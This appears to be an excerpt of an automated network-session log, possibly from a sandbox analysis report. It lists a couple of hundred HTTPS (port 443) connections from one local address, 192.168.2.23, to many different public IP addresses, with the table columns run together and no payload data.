                                            29212192.168.2.233551092.139.71.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29213192.168.2.235399868.223.84.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29214192.168.2.234730069.193.56.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29215192.168.2.234336012.19.51.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29216192.168.2.235396294.6.40.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29217192.168.2.2349466133.60.175.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29218192.168.2.2349826122.86.120.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29219192.168.2.2350152201.211.120.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29220192.168.2.234158443.7.203.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29221192.168.2.2352600210.202.106.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29222192.168.2.234995081.47.230.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29223192.168.2.2347906174.131.60.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29224192.168.2.2349668202.238.177.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29225192.168.2.23433542.42.190.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29226192.168.2.2348790197.42.193.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29227192.168.2.2335630199.27.126.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29228192.168.2.2352790149.117.50.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29229192.168.2.2342816107.31.32.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29230192.168.2.2354092105.168.81.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29231192.168.2.2355264174.31.138.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29232192.168.2.233512637.63.155.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29233192.168.2.2337814199.41.173.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29234192.168.2.234142482.217.139.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29235192.168.2.235641883.141.43.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29236192.168.2.235285824.231.125.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29237192.168.2.235276075.207.37.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29238192.168.2.234114627.226.44.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29239192.168.2.2335394131.115.39.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29240192.168.2.2344406111.124.197.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29241192.168.2.23419124.52.43.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29242192.168.2.234144646.162.114.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29243192.168.2.233399236.30.65.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29244192.168.2.2336046103.235.65.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29245192.168.2.2334332217.83.108.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29246192.168.2.2360142164.219.131.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29247192.168.2.234832623.13.225.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29248192.168.2.2342538182.26.65.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29249192.168.2.2343034116.195.58.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29250192.168.2.2352904190.93.107.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29251192.168.2.2334510176.215.210.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29252192.168.2.2335378165.101.86.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29253192.168.2.236093099.100.200.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29254192.168.2.2353398193.172.77.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29255192.168.2.2352874166.6.179.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29256192.168.2.235240239.59.98.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29257192.168.2.2360150110.35.98.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29258192.168.2.2351424130.137.65.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29259192.168.2.2345350153.249.199.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29260192.168.2.23367889.94.107.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29261192.168.2.2357618180.128.4.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29262192.168.2.2350400168.210.200.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29263192.168.2.2348074208.56.81.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29264192.168.2.2340088116.9.125.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29265192.168.2.2336898122.46.218.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29266192.168.2.2356186184.159.115.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29267192.168.2.2350530142.192.17.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29268192.168.2.235904035.57.200.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29269192.168.2.23334862.24.70.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29270192.168.2.234516259.159.15.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29271192.168.2.234358278.43.201.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29272192.168.2.23590628.161.2.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29273192.168.2.2357516203.19.255.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29274192.168.2.2334232186.176.9.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29275192.168.2.2347004195.63.31.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29276192.168.2.2333282158.253.134.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29277192.168.2.235276669.178.221.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29278192.168.2.2358858209.9.72.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29279192.168.2.235018817.231.108.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29280192.168.2.234919076.100.191.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29281192.168.2.2357562203.88.45.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29282192.168.2.2359698143.238.140.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29283192.168.2.234818284.19.206.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29284192.168.2.2352840187.59.99.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29285192.168.2.2352050180.144.72.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29286192.168.2.2359168167.226.34.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29287192.168.2.2346374116.217.46.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29288192.168.2.235264898.73.188.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29289192.168.2.2334988176.189.228.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29290192.168.2.2342188158.30.30.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29291192.168.2.234069214.160.62.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29292192.168.2.2343276152.220.250.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29293192.168.2.2335266175.98.195.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29294192.168.2.2355610103.52.122.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29295192.168.2.233656272.41.247.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29296192.168.2.2350188201.199.24.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29297192.168.2.2341040123.63.250.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29298192.168.2.2343622208.140.65.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29299192.168.2.233961268.165.154.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29300192.168.2.2352608110.21.154.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29301192.168.2.2340232202.150.202.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29302192.168.2.2332990204.4.174.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29303192.168.2.233661485.71.43.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29304192.168.2.2359158189.90.47.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29305192.168.2.235962663.95.145.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29306192.168.2.2334910207.245.110.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29307192.168.2.2357702206.101.247.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29308192.168.2.2337564212.45.208.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29309192.168.2.234220025.109.22.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29310192.168.2.234092068.196.142.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29311192.168.2.234963212.107.15.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29312192.168.2.2360100185.44.167.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29313192.168.2.2358250102.128.120.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29314192.168.2.236025062.116.217.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29315192.168.2.2356102200.101.129.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29316192.168.2.2355198113.34.252.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29317192.168.2.2337086158.159.6.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29318192.168.2.233755658.252.89.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29319192.168.2.2334496154.41.56.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29320192.168.2.2338466161.102.153.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29321192.168.2.233836474.131.104.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29322192.168.2.235189083.242.102.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29323192.168.2.2333626117.178.13.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29324192.168.2.234803039.151.76.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29325192.168.2.234254643.17.104.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29326192.168.2.2349126163.62.122.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29327192.168.2.2345532107.191.133.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29328192.168.2.236078012.243.227.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29329192.168.2.2345648202.175.189.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29330192.168.2.235583440.15.139.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29331192.168.2.235479246.224.211.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29332192.168.2.2341240180.104.118.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29333192.168.2.2359680212.78.132.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29334192.168.2.2355076102.108.114.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29335192.168.2.2344172115.193.7.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29336192.168.2.234150683.101.248.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29337192.168.2.2357178164.183.101.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29338192.168.2.235137881.167.79.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29339192.168.2.2333200108.242.250.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29340192.168.2.2346154131.217.138.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29341192.168.2.234803263.223.11.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29342192.168.2.2334040153.67.178.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29343192.168.2.235199034.219.199.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29344192.168.2.234871820.157.158.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29345192.168.2.2332982218.175.219.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29346192.168.2.2344536108.138.155.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29347192.168.2.235325232.235.153.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29348192.168.2.235098292.94.238.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29349192.168.2.234776242.224.219.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29350192.168.2.234967488.78.94.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29351192.168.2.2358346117.122.174.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29352192.168.2.235825484.149.39.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29353192.168.2.2343596166.14.214.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29354192.168.2.234903898.129.10.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29355192.168.2.2349570184.61.98.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29356192.168.2.2359966120.178.243.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29357192.168.2.234504464.89.242.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29358192.168.2.2357866153.109.213.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29359192.168.2.2358450192.175.188.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29360192.168.2.2335554189.95.72.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29361192.168.2.2351850220.51.180.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29362192.168.2.233277219.46.122.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29363192.168.2.233645685.44.220.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29364192.168.2.2358570120.231.128.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29365192.168.2.2345278112.199.8.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29366192.168.2.2332992191.58.49.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29367192.168.2.234080677.107.49.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29368192.168.2.2335428100.179.107.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29369192.168.2.2356018109.195.91.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29370192.168.2.2348806184.172.82.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29371192.168.2.234359244.124.195.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29372192.168.2.23451868.54.172.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29373192.168.2.234885258.189.242.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29374192.168.2.235694042.139.2.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29375192.168.2.2350946153.159.224.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29376192.168.2.2354018124.184.125.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29377192.168.2.2358072178.39.59.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29378192.168.2.2347842217.116.177.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29379192.168.2.2349084163.194.213.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29380192.168.2.2340508191.106.5.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29381192.168.2.235617686.32.174.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29382192.168.2.2332892167.205.220.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29383192.168.2.23347102.210.71.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29384192.168.2.233466024.74.129.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29385192.168.2.23357561.197.136.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29386192.168.2.2355166213.192.207.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29387192.168.2.234780831.142.94.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29388192.168.2.235227095.1.219.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29389192.168.2.2338422194.246.21.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29390192.168.2.233292684.46.243.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29391192.168.2.2360798165.214.105.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29392192.168.2.2346436202.229.64.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29393192.168.2.2338344199.110.222.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29394192.168.2.234191239.32.60.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29395192.168.2.2337082168.223.244.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29396192.168.2.2337614178.141.186.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29397192.168.2.233835654.84.163.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29398192.168.2.233550674.184.0.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29399192.168.2.2334430175.204.47.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29400192.168.2.233783463.111.124.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29401192.168.2.2353140126.109.210.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29402192.168.2.2347372149.44.76.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29403192.168.2.233829669.51.84.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29404192.168.2.233347634.235.242.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29405192.168.2.2360520114.190.5.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29406192.168.2.2347474166.201.69.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29407192.168.2.233822695.210.208.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29408192.168.2.2341164101.160.167.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29409192.168.2.23590128.105.142.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29410192.168.2.234179498.240.160.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29411192.168.2.235257276.122.31.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29412192.168.2.233576283.128.167.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29413192.168.2.233792452.125.131.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29414192.168.2.233329832.216.109.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29415192.168.2.235098849.145.64.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29416192.168.2.2360162209.118.123.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29417192.168.2.235427846.196.99.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29418192.168.2.2342330158.48.231.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29419192.168.2.2337210140.170.201.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29420192.168.2.235993027.147.156.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29421192.168.2.2345784146.146.192.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29422192.168.2.235590265.167.16.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29423192.168.2.234970286.236.135.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29424192.168.2.2349174164.243.210.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29425192.168.2.235599098.102.216.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29426192.168.2.235324286.33.61.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29427192.168.2.2349776176.98.204.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29428192.168.2.2338134132.253.68.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29429192.168.2.233517089.108.241.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29430192.168.2.235455662.181.4.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29431192.168.2.235607237.110.87.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29432192.168.2.233805247.132.245.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29433192.168.2.2359216165.138.178.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
